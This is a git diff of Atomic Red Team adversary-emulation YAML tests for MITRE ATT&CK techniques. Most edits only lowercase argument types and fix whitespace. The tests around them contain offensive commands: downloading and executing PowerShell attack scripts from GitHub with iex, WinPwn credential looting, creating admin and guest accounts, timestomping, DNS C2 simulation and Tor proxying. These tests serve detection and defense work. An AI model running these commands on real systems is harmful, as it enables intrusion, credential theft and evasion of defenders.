-82,7 +83,7 @@ atomic_tests: input_arguments: folder_to_delete: description: Folder to delete. Run the prereq command to create it if it does not exist. - type: String + type: string default: '%temp%\deleteme_T1551.004' dependency_executor_name: command_prompt dependencies: @@ -105,7 +106,7 @@ atomic_tests: input_arguments: file_to_delete: description: File to delete. Run the prereq command to create it if it does not exist. - type: String + type: string default: $env:TEMP\deleteme_T1551.004 dependency_executor_name: powershell dependencies: @@ -128,7 +129,7 @@ atomic_tests: input_arguments: folder_to_delete: description: Folder to delete. Run the prereq command to create it if it does not exist. - type: String + type: string default: $env:TEMP\deleteme_folder_T1551.004 dependency_executor_name: powershell dependencies: @@ -177,7 +178,7 @@ atomic_tests: input_arguments: teamviewer_log_file: description: Teamviewer log file to create and delete. - type: String + type: string default: $env:TEMP\TeamViewer_54.log executor: command: | diff --git a/atomics/T1070.005/T1070.005.yaml b/atomics/T1070.005/T1070.005.yaml index a056053b..7d841cd4 100644 --- a/atomics/T1070.005/T1070.005.yaml +++ b/atomics/T1070.005/T1070.005.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: share_name: description: Share to add. - type: String + type: string default: '\\test\share' executor: command: | @@ -26,7 +26,7 @@ atomic_tests: input_arguments: share_name: description: Share to remove. - type: String + type: string default: '\\test\share' executor: command: | @@ -41,7 +41,7 @@ atomic_tests: input_arguments: share_name: description: Share to remove. - type: String + type: string default: '\\test\share' executor: command: | @@ -60,13 +60,13 @@ atomic_tests: - windows executor: command: | - reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f - reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /t REG_DWORD /d 0 /f + reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /t REG_DWORD /d 0 /f cleanup_command: | - reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /f - reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /f + reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareServer /f + reg delete "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters" /v AutoShareWks /f name: command_prompt - elevation_required: true + elevation_required: true - name: Remove Administrative Shares auto_generated_guid: 4299eff5-90f1-4446-b2f3-7f4f5cfd5d62 description: | diff --git a/atomics/T1070.006/T1070.006.yaml b/atomics/T1070.006/T1070.006.yaml index 7abc8c98..928dbf1c 100644 --- a/atomics/T1070.006/T1070.006.yaml +++ b/atomics/T1070.006/T1070.006.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: target_filename: description: Path of file that we are going to stomp on last access time - type: Path + type: path default: /opt/filename executor: command: | @@ -27,7 +27,7 @@ atomic_tests: input_arguments: target_filename: description: Path of file that we are going to stomp on last access time - type: Path + type: path default: /opt/filename executor: command: | @@ -46,7 +46,7 @@ atomic_tests: input_arguments: target_filename: description: Path of file that we are going to stomp on last access time - type: Path + type: path default: /opt/filename executor: command: | @@ -68,11 +68,11 @@ atomic_tests: input_arguments: target_file_path: description: Path of file to modify timestamps of - type: Path + type: path default: /opt/filename reference_file_path: description: Path of reference file to read timestamps from - type: Path + type: path default: /bin/sh executor: command: | @@ -88,11 +88,11 @@ atomic_tests: input_arguments: target_date_time: description: Date/time to replace original timestamps with - type: String + type: string default: 01/01/1970 00:00:00 file_path: description: Path of file to change creation timestamp - type: Path + type: path default: $env:TEMP\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: @@ -117,11 +117,11 @@ atomic_tests: input_arguments: target_date_time: description: Date/time to replace original timestamps with - type: String + type: string default: 01/01/1970 00:00:00 file_path: description: Path of file to change modified timestamp - type: Path + type: path default: $env:TEMP\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: @@ -146,11 +146,11 @@ atomic_tests: input_arguments: target_date_time: description: Date/time to replace original timestamps with - type: String + type: string default: 01/01/1970 00:00:00 file_path: description: Path of file to change last access timestamp - type: Path + type: path default: $env:TEMP\T1551.006_timestomp.txt dependency_executor_name: powershell dependencies: @@ -178,7 +178,7 @@ atomic_tests: input_arguments: file_path: description: File path for timestomp payload - type: String + type: string default: $env:appdata\Microsoft dependency_executor_name: powershell dependencies: diff --git a/atomics/T1071.001/T1071.001.yaml b/atomics/T1071.001/T1071.001.yaml index 80812544..e7088bae 100644 --- a/atomics/T1071.001/T1071.001.yaml +++ b/atomics/T1071.001/T1071.001.yaml @@ -13,7 +13,7 @@ atomic_tests: input_arguments: domain: description: Default domain to simulate against - type: String + type: string default: www.google.com executor: command: | @@ -34,24 +34,24 @@ atomic_tests: input_arguments: domain: description: Default domain to simulate against - type: String + type: string default: www.google.com curl_path: description: path to curl.exe - type: Path + type: path default: C:\Windows\System32\Curl.exe - dependency_executor_name: powershell - dependencies: - - description: | - Curl must be installed on system - prereq_command: | - if (Test-Path #{curl_path}) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip - Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl - Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path} - Remove-Item $env:temp\curl - Remove-Item $env:temp\curl.zip + dependency_executor_name: powershell + dependencies: + - description: | + Curl must be installed on system + prereq_command: | + if (Test-Path #{curl_path}) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest "https://curl.haxx.se/windows/dl-7.71.1/curl-7.71.1-win32-mingw.zip" -Outfile $env:temp\curl.zip + Expand-Archive -Path $env:temp\curl.zip -DestinationPath $env:temp\curl + Copy-Item $env:temp\curl\curl-7.71.1-win32-mingw\bin\curl.exe #{curl_path} + Remove-Item $env:temp\curl + Remove-Item $env:temp\curl.zip executor: command: | #{curl_path} -s -A "HttpBrowser/1.0" -m3 #{domain} >nul 2>&1 @@ -70,7 +70,7 @@ atomic_tests: input_arguments: domain: description: Default domain to simulate against - type: String + type: string default: www.google.com executor: command: | diff --git a/atomics/T1071.004/T1071.004.yaml b/atomics/T1071.004/T1071.004.yaml index e913e9bd..d470b3ba 100644 --- a/atomics/T1071.004/T1071.004.yaml +++ b/atomics/T1071.004/T1071.004.yaml @@ -12,19 +12,19 @@ atomic_tests: input_arguments: query_type: description: DNS query type - type: String + type: string default: TXT subdomain: description: Subdomain prepended to the domain name - type: String + type: string default: atomicredteam query_volume: description: Number of DNS queries to send - type: Integer + type: integer default: 1000 domain: description: Default domain to simulate against - type: String + type: string default: 127.0.0.1.xip.io executor: command: | @@ -41,27 +41,27 @@ atomic_tests: input_arguments: runtime: description: Time in minutes to run the simulation - type: Integer + type: integer default: 30 domain: description: Default domain to simulate against - type: String + type: string default: 127.0.0.1.xip.io subdomain: description: Subdomain prepended to the domain name - type: String + type: string default: atomicredteam query_type: description: DNS query type - type: String + type: string default: TXT c2_interval: description: Seconds between C2 requests to the command and control server - type: Integer + type: integer default: 30 c2_jitter: description: Percentage of jitter to add to the C2 interval to create variance in the times between C2 requests - type: Integer + type: integer default: 20 executor: command: | @@ -79,15 +79,15 @@ atomic_tests: input_arguments: query_type: description: DNS query type - type: String + type: string default: TXT subdomain: description: Subdomain prepended to the domain name (should be 63 characters to test maximum length) - type: String + type: string default: atomicredteamatomicredteamatomicredteamatomicredteamatomicredte domain: description: Default domain to simulate against - type: String + type: string default: 127.0.0.1.xip.io executor: command: | @@ -108,11 +108,11 @@ atomic_tests: input_arguments: domain: description: Domain Name configured to use DNS Server where your C2 listener is running - type: String + type: string default: example.com server_ip: description: IP address of DNS server where your C2 listener is running - type: String + type: string default: 127.0.0.1 executor: command: | diff --git a/atomics/T1072/T1072.yaml b/atomics/T1072/T1072.yaml index 7a114eea..1adc6edc 100644 --- a/atomics/T1072/T1072.yaml +++ b/atomics/T1072/T1072.yaml @@ -1,68 +1,66 @@ attack_technique: T1072 display_name: Software Deployment Tools atomic_tests: -- name: Radmin Viewer Utility +- name: Radmin Viewer Utility auto_generated_guid: b4988cad-6ed2-434d-ace5-ea2670782129 description: | An adversary may use Radmin Viewer Utility to remotely control Windows device, this will start the radmin console. supported_platforms: - - windows + - windows input_arguments: radmin_installer: description: Radmin Viewer installer - type: Path + type: path default: 'RadminViewer.msi' radmin_exe: description: The radmin.exe executable from RadminViewer.msi - type: Path + type: path default: 'Radmin Viewer 3/Radmin.exe' - dependency_executor_name: powershell dependencies: - - description: | - Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) - prereq_command: | - if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1} - get_prereq_command: | - Write-Host Downloading radmin installer - (New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}") - Write-Host Install Radmin - Start-Process msiexec -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn + - description: | + Radmin Viewer Utility must be installed at specified location (#{radmin_exe}) + prereq_command: | + if (Test-Path "${env:ProgramFiles(x86)}/#{radmin_exe}") {exit 0} else {exit 1} + get_prereq_command: | + Write-Host Downloading radmin installer + (New-Object Net.WebClient).DownloadFile("https://www.radmin.com/download/Radmin_Viewer_3.5.2.1_EN.msi","$ENV:Temp\#{radmin_installer}") + Write-Host Install Radmin + Start-Process msiexec -Wait -ArgumentList /i , $ENV:Temp\#{radmin_installer}, /qn executor: name: command_prompt - elevation_required: true - command: | + elevation_required: true + command: | "%PROGRAMFILES(x86)%/#{radmin_exe}" - + - name: PDQ Deploy RAT auto_generated_guid: e447b83b-a698-4feb-bed1-a7aaf45c3443 description: | An adversary may use PDQ Deploy Software to deploy the Remote Adminstartion Tool, this will start the PDQ console. supported_platforms: - - windows + - windows input_arguments: PDQ_Deploy_installer: description: PDQ Deploy Install - type: Path + type: path default: 'PDQDeploysetup.exe' PDQ_Deploy_exe: description: The PDQDeployConsole.exe executable from PDQDeploysetup.exe - type: Path + type: path default: 'Admin Arsenal/PDQ Deploy/PDQDeployConsole.exe' - dependency_executor_name: powershell dependencies: - - description: | - PDQ Deploy will be installed at specified location (#{PDQ_Deploy_exe}) - prereq_command: | - if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1} - get_prereq_command: | - Write-Host Downloading PDQ Deploy installer - (New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}") - Write-Host Install PDQ Deploy - Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s" + - description: | + PDQ Deploy will be installed at specified location (#{PDQ_Deploy_exe}) + prereq_command: | + if (Test-Path "${env:ProgramFiles(x86)}/#{PDQ_Deploy_exe}") {exit 0} else {exit 1} + get_prereq_command: | + Write-Host Downloading PDQ Deploy installer + (New-Object Net.WebClient).DownloadFile("https://download.pdq.com/release/19/Deploy_19.3.350.0.exe","$ENV:Temp\#{PDQ_Deploy_installer}") + Write-Host Install PDQ Deploy + Start-Process $ENV:Temp\#{PDQ_Deploy_installer} -Wait -ArgumentList "/s" executor: name: command_prompt - elevation_required: true - command: | + elevation_required: true + command: | "%PROGRAMFILES(x86)%/#{PDQ_Deploy_exe}" diff --git a/atomics/T1074.001/T1074.001.yaml b/atomics/T1074.001/T1074.001.yaml index 3db37d0d..9ad8aaa6 100644 --- a/atomics/T1074.001/T1074.001.yaml +++ b/atomics/T1074.001/T1074.001.yaml @@ -11,7 +11,7 @@ atomic_tests: input_arguments: output_file: description: Location to save downloaded discovery.bat file - type: Path + type: path default: $env:TEMP\discovery.bat executor: command: | @@ -29,7 +29,7 @@ atomic_tests: input_arguments: output_file: description: Location to save downloaded discovery.bat file - type: Path + type: path default: /tmp/T1074.001_discovery.log executor: command: | @@ -45,11 +45,11 @@ atomic_tests: input_arguments: output_file: description: Location to save zipped file or folder - type: Path + type: path default: $env:TEMP\Folder_to_zip.zip input_file: description: Location of file or folder to zip - type: Path + type: path default: PathToAtomicsFolder\T1074.001\bin\Folder_to_zip executor: command: | @@ -57,4 +57,3 @@ atomic_tests: cleanup_command: | Remove-Item -Path #{output_file} -ErrorAction Ignore name: powershell - diff --git a/atomics/T1078.001/T1078.001.yaml b/atomics/T1078.001/T1078.001.yaml index 91579937..ae88fe63 100644 --- a/atomics/T1078.001/T1078.001.yaml +++ b/atomics/T1078.001/T1078.001.yaml @@ -11,23 +11,23 @@ atomic_tests: input_arguments: guest_user: description: Specify the guest account - type: String + type: string default: guest guest_password: description: Specify the guest password - type: String + type: string default: Password123! local_admin_group: description: Specify the admin localgroup name - type: String + type: string default: Administrators remote_desktop_users_group_name: description: Specify the remote desktop users group name - type: String + type: string default: Remote Desktop Users remove_rdp_access_during_cleanup: description: Set to 1 if you want the cleanup to remove RDP access to machine - type: Integer + type: integer default: 0 executor: command: |- @@ -56,13 +56,13 @@ atomic_tests: input_arguments: guest_user: description: Specify the guest account - type: String + type: string default: guest executor: command: | - net user #{guest_user} /active:yes + net user #{guest_user} /active:yes cleanup_command: | - net user #{guest_user} /active:no + net user #{guest_user} /active:no name: command_prompt elevation_required: true diff --git a/atomics/T1078.003/T1078.003.yaml b/atomics/T1078.003/T1078.003.yaml index f219e9cd..2867ae15 100644 --- a/atomics/T1078.003/T1078.003.yaml +++ b/atomics/T1078.003/T1078.003.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: password: description: Password for art-test user - type: String + type: string default: -4RTisCool!-321 executor: command: |- @@ -22,7 +22,7 @@ atomic_tests: net user art-test /delete >nul 2>&1 name: command_prompt elevation_required: true - + - name: Create local account with admin privileges - MacOS auto_generated_guid: f1275566-1c26-4b66-83e3-7f9f7f964daa description: After execution the new account will be active and added to the Administrators group @@ -42,7 +42,7 @@ atomic_tests: sudo dscl . -delete /Users/AtomicUser name: bash elevation_required: true -- name: WinPwn - Loot local Credentials - powerhell kittie +- name: WinPwn - Loot local Credentials - powerhell kittie auto_generated_guid: 9e9fd066-453d-442f-88c1-ad7911d32912 description: Loot local Credentials - powerhell kittie technique via function of WinPwn supported_platforms: diff --git a/atomics/T1078.004/T1078.004.yaml b/atomics/T1078.004/T1078.004.yaml index 96f34cf6..8ec0c757 100644 --- a/atomics/T1078.004/T1078.004.yaml +++ b/atomics/T1078.004/T1078.004.yaml @@ -1,4 +1,3 @@ ---- attack_technique: T1078.004 display_name: 'Valid Accounts: Cloud Accounts' @@ -9,28 +8,28 @@ atomic_tests: GCP Service Accounts can be used to gain intial access as well as maintain persistence inside Google Cloud. supported_platforms: - - google-workspace - - iaas:gcp + - google-workspace + - iaas:gcp input_arguments: project-id: description: ID of the project, you want to create service account as well as service account key for - type: String + type: string default: art-project-1 service-account-name: description: Name of the service account - type: String + type: string default: gcp-art-service-account-1 service-account-email: description: Email of the service account - type: String + type: string default: gcp-art-service-account-1@art-project-1.iam.gserviceaccount.com output-key-file: description: Email of the service account - type: String + type: string default: gcp-art-service-account-1.json executor: @@ -46,11 +45,9 @@ atomic_tests: dependency_executor_name: sh dependencies: - - description: | - Requires gcloud - prereq_command: | - if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; - get_prereq_command: | - echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" - - + - description: | + Requires gcloud + prereq_command: | + if [ -x "$(command -v gcloud)" ]; then exit 0; else exit 1; fi; + get_prereq_command: | + echo "Please Install Google Cloud SDK before running this atomic test : https://cloud.google.com/sdk/docs/install" diff --git a/atomics/T1082/T1082.yaml b/atomics/T1082/T1082.yaml index 378fb2bc..050bf4bd 100644 --- a/atomics/T1082/T1082.yaml +++ b/atomics/T1082/T1082.yaml @@ -33,7 +33,7 @@ atomic_tests: input_arguments: output_file: description: Output file used to store the results. - type: Path + type: path default: /tmp/T1082.txt executor: command: | @@ -119,17 +119,17 @@ atomic_tests: input_arguments: vbscript: description: Path to sample script - type: String + type: string default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs dependency_executor_name: powershell dependencies: - - description: | - Sample script file must exist on disk at specified location (#{vbscript}) - prereq_command: | - if (Test-Path #{vbscript}) {exit 0} else {exit 1} - get_prereq_command: | - New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null - Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}" + - description: | + Sample script file must exist on disk at specified location (#{vbscript}) + prereq_command: | + if (Test-Path #{vbscript}) {exit 0} else {exit 1} + get_prereq_command: | + New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null + Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}" executor: command: 'cscript #{vbscript}' name: powershell @@ -167,7 +167,7 @@ atomic_tests: name: sh - name: WinPwn - winPEAS auto_generated_guid: eea1d918-825e-47dd-acc2-814d6c58c0e1 - description: Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn + description: Discover Local Privilege Escalation possibilities using winPEAS function of WinPwn supported_platforms: - windows executor: @@ -178,7 +178,7 @@ atomic_tests: name: powershell - name: WinPwn - itm4nprivesc auto_generated_guid: 3d256a2f-5e57-4003-8eb6-64d91b1da7ce - description: Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn + description: Discover Local Privilege Escalation possibilities using itm4nprivesc function of WinPwn supported_platforms: - windows executor: @@ -189,7 +189,7 @@ atomic_tests: name: powershell - name: WinPwn - Powersploits privesc checks auto_generated_guid: 345cb8e4-d2de-4011-a580-619cf5a9e2d7 - description: Powersploits privesc checks using oldchecks function of WinPwn + description: Powersploits privesc checks using oldchecks function of WinPwn supported_platforms: - windows executor: @@ -206,7 +206,7 @@ atomic_tests: name: powershell - name: WinPwn - General privesc checks auto_generated_guid: 5b6f39a2-6ec7-4783-a5fd-2c54a55409ed - description: General privesc checks using the otherchecks function of WinPwn + description: General privesc checks using the otherchecks function of WinPwn supported_platforms: - windows executor: @@ -249,7 +249,7 @@ atomic_tests: RBCD-Check -consoleoutput -noninteractive name: powershell -- name: WinPwn - PowerSharpPack - Watson searching for missing windows patches +- name: WinPwn - PowerSharpPack - Watson searching for missing windows patches auto_generated_guid: 07b18a66-6304-47d2-bad0-ef421eb2e107 description: PowerSharpPack - Watson searching for missing windows patches technique via function of WinPwn supported_platforms: @@ -269,12 +269,12 @@ atomic_tests: iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-SharpUp.ps1') Invoke-SharpUp -command "audit" name: powershell - -- name: WinPwn - PowerSharpPack - Seatbelt + +- name: WinPwn - PowerSharpPack - Seatbelt auto_generated_guid: 5c16ceb4-ba3a-43d7-b848-a13c1f216d95 description: |- PowerSharpPack - Seatbelt technique via function of WinPwn. - + [Seatbelt](https://github.com/GhostPack/Seatbelt) is a C# project that performs a number of security oriented host-survey "safety checks" relevant from both offensive and defensive security perspectives. supported_platforms: - windows @@ -294,11 +294,11 @@ atomic_tests: input_arguments: username: description: Azure AD username - type: String - default: null + type: string + default: password: description: Azure AD password - type: String + type: string default: T1082Az dependency_executor_name: powershell dependencies: @@ -369,4 +369,3 @@ atomic_tests: wmic OS get Caption,OSArchitecture,Version wmic DISKDRIVE get Caption name: command_prompt - diff --git a/atomics/T1083/T1083.yaml b/atomics/T1083/T1083.yaml index 25958c4c..b36f4540 100644 --- a/atomics/T1083/T1083.yaml +++ b/atomics/T1083/T1083.yaml @@ -9,9 +9,9 @@ atomic_tests: - windows input_arguments: output_file: - description: File to output results to - type: String - default: '%temp%\T1083Test1.txt' + description: File to output results to + type: string + default: '%temp%\T1083Test1.txt' executor: command: | dir /s c:\ >> #{output_file} @@ -52,7 +52,7 @@ atomic_tests: input_arguments: output_file: description: Output file used to store the results. - type: Path + type: path default: /tmp/T1083.txt executor: command: | @@ -77,7 +77,7 @@ atomic_tests: input_arguments: output_file: description: Output file used to store the results. - type: Path + type: path default: /tmp/T1083.txt executor: command: | @@ -99,7 +99,7 @@ atomic_tests: input_arguments: File_to_output: description: File to output results to - type: String + type: string default: $env:temp\T1083Test5.txt executor: command: | @@ -116,19 +116,19 @@ atomic_tests: cat #{File_to_output} cleanup_command: | remove-item #{File_to_output} -ErrorAction SilentlyContinue - name: powershell + name: powershell - name: Launch DirLister Executable auto_generated_guid: c5bec457-43c9-4a18-9a24-fe151d8971b7 description: |- Launches the DirLister executable for a short period of time and then exits. - + Recently seen used by [BlackCat ransomware](https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/) to create a list of accessible directories and files. supported_platforms: - windows input_arguments: dirlister_path: description: 'Path to the DirLister executable ' - type: String + type: string default: PathToAtomicsFolder\T1083\bin\DirLister.exe dependency_executor_name: powershell dependencies: diff --git a/atomics/T1087.001/T1087.001.yaml b/atomics/T1087.001/T1087.001.yaml index ef8f4fe5..4298aa8b 100644 --- a/atomics/T1087.001/T1087.001.yaml +++ b/atomics/T1087.001/T1087.001.yaml @@ -10,7 +10,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1087.001.txt executor: command: | @@ -29,7 +29,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1087.001.txt executor: command: | @@ -49,7 +49,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1087.001.txt executor: command: | @@ -86,7 +86,7 @@ atomic_tests: input_arguments: output_file: description: Path where captured results will be placed - type: Path + type: path default: /tmp/T1087.001.txt dependency_executor_name: sh dependencies: diff --git a/atomics/T1087.002/T1087.002.yaml b/atomics/T1087.002/T1087.002.yaml index a59cd57d..33970fda 100644 --- a/atomics/T1087.002/T1087.002.yaml +++ b/atomics/T1087.002/T1087.002.yaml @@ -34,7 +34,7 @@ atomic_tests: input_arguments: computer_name: description: Name of remote system to query - type: String + type: string default: "%COMPUTERNAME%" executor: command: | @@ -50,7 +50,7 @@ atomic_tests: input_arguments: adrecon_path: description: Path of ADRecon.ps1 file - type: Path + type: path default: $env:TEMP\ADRecon.ps1 dependency_executor_name: powershell dependencies: @@ -77,7 +77,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -101,7 +101,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -125,7 +125,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -149,7 +149,7 @@ atomic_tests: input_arguments: adfind_path: description: Path to the AdFind executable - type: Path + type: path default: PathToAtomicsFolder\T1087.002\src\AdFind.exe dependency_executor_name: powershell dependencies: @@ -186,11 +186,11 @@ atomic_tests: input_arguments: domain: description: Domain FQDN - type: String + type: string default: $env:UserDnsDomain uac_prop: description: UAC Property to search - type: String + type: string default: 524288 dependencies: - description: | @@ -282,13 +282,13 @@ atomic_tests: supported_platforms: - windows input_arguments: - Domain: + Domain: description: Domain that is being tested against - type: String + type: string default: $env:USERDOMAIN DomainController: description: Domain Controller that is being tested against - type: String + type: string default: $env:UserDnsDomain dependency_executor_name: powershell dependencies: diff --git a/atomics/T1090.001/T1090.001.yaml b/atomics/T1090.001/T1090.001.yaml index f246d094..74eee5a6 100644 --- a/atomics/T1090.001/T1090.001.yaml +++ b/atomics/T1090.001/T1090.001.yaml @@ -13,11 +13,11 @@ atomic_tests: input_arguments: proxy_server: description: Proxy server URL (host:port) - type: Url + type: url default: 127.0.0.1:8080 proxy_scheme: description: Protocol to proxy (http or https) - type: String + type: string default: http executor: command: | @@ -31,22 +31,22 @@ atomic_tests: description: | Enable traffic redirection on macOS UI (not terminal). The test will modify and enable the "Web Proxy" and "Secure Web Proxy" settings in System Preferences => Network => Advanced => Proxies for the specified network interface. - + Note that this test may conflict with pre-existing system configuration. supported_platforms: - - macos + - macos input_arguments: proxy_server: description: Proxy server URL (host) - type: Url + type: url default: 127.0.0.1 proxy_port: description: Proxy server port - type: Integer + type: integer default: 8080 interface: description: Protocol to proxy (http or https) - type: String + type: string default: Wi-Fi executor: name: sh @@ -67,15 +67,15 @@ atomic_tests: input_arguments: connectaddress: description: Specifies the IPv4 address to which to connect. Acceptable values are IP address, computer NetBIOS name, or computer DNS name. If an address is not specified, the default is the local computer. - type: String + type: string default: 127.0.0.1 connectport: description: Specifies the IPv4 port, by port number or service name, to which to connect. If connectport is not specified, the default is the value of listenport on the local computer. - type: String + type: string default: "1337" listenport: description: Specifies the IPv4 port, by port number or service name, on which to listen. - type: String + type: string default: "1337" executor: command: netsh interface portproxy add v4tov4 listenport=#{listenport} connectport=#{connectport} connectaddress=#{connectaddress} diff --git a/atomics/T1090.003/T1090.003.yaml b/atomics/T1090.003/T1090.003.yaml index 9953ea53..57b7c5fe 100644 --- a/atomics/T1090.003/T1090.003.yaml +++ b/atomics/T1090.003/T1090.003.yaml @@ -11,29 +11,29 @@ atomic_tests: http://s3.amazonaws.com/0ubz-2q11-gi9y/en.html https://psiphon.ca/faq.html supported_platforms: - - windows - dependency_executor_name: powershell + - windows + dependency_executor_name: powershell dependencies: - - description: | - The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt - prereq_command: | - if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1} - get_prereq_command: | - if(-not (test-path $env:Temp\proxy-backup.txt)){ - $Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer - Set-Content $env:Temp\proxy-backup.txt $Proxy} - - description: | - The Psiphon executable must exist in the Downloads folder - prereq_command: | - if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe" - - description: | - Batch file containing commands to run must be in src directory - prereq_command: | - if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat) {exit 0} else {exit 1} - get_prereq_command: | - Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat" + - description: | + The proxy settings backup file must exist on disk at $env:Temp\proxy-backup.txt + prereq_command: | + if (Test-Path $env:Temp\proxy-backup.txt) {exit 0} else {exit 1} + get_prereq_command: | + if(-not (test-path $env:Temp\proxy-backup.txt)){ + $Proxy = (Get-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Internet Settings' -Name "ProxyServer" -ErrorAction Ignore).ProxyServer + Set-Content $env:Temp\proxy-backup.txt $Proxy} + - description: | + The Psiphon executable must exist in the Downloads folder + prereq_command: | + if (Test-Path $env:UserProfile\Downloads\psiphon3.exe) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile "$env:UserProfile\Downloads\psiphon3.exe" "https://s3.amazonaws.com/0ubz-2q11-gi9y/psiphon3.exe" + - description: | + Batch file containing commands to run must be in src directory + prereq_command: | + if (Test-Path PathToAtomicsFolder\T1090.003\src\Psiphon.bat) {exit 0} else {exit 1} + get_prereq_command: | + Invoke-WebRequest -OutFile "PathToAtomicsFolder\T1090.003\src\Psiphon.bat" "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1090.003/src/Psiphon.bat" executor: name: powershell command: | @@ -52,8 +52,8 @@ atomic_tests: - windows input_arguments: TorExe: - description: Location of tor.exe file. - type: String + description: Location of tor.exe file. + type: string default: $env:temp\tor\Tor\tor.exe dependency_executor_name: powershell dependencies: @@ -66,9 +66,9 @@ atomic_tests: expand-archive -LiteralPath "$env:temp\tor.zip" -DestinationPath "$env:temp\tor" executor: command: | - invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}' - sleep -s 60 - stop-process -name "tor" | out-null + invoke-expression 'cmd /c start powershell -Command {cmd /c #{TorExe}}' + sleep -s 60 + stop-process -name "tor" | out-null name: powershell elevation_required: false - name: Tor Proxy Usage - Debian/Ubuntu @@ -81,16 +81,16 @@ atomic_tests: dependency_executor_name: sh dependencies: - description: | - Tor must be installed on the machine + Tor must be installed on the machine prereq_command: | - if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi + if [ -x "$(command -v tor --version)" ]; then exit 0; else exit 1; fi get_prereq_command: | - sudo apt-get -y install tor + sudo apt-get -y install tor executor: command: | - sudo systemctl start tor + sudo systemctl start tor cleanup_command: | - sudo systemctl stop tor + sudo systemctl stop tor name: sh - name: Tor Proxy Usage - MacOS auto_generated_guid: 12631354-fdbc-4164-92be-402527e748da @@ -102,15 +102,15 @@ atomic_tests: dependency_executor_name: sh dependencies: - description: | - Tor must be installed on the machine 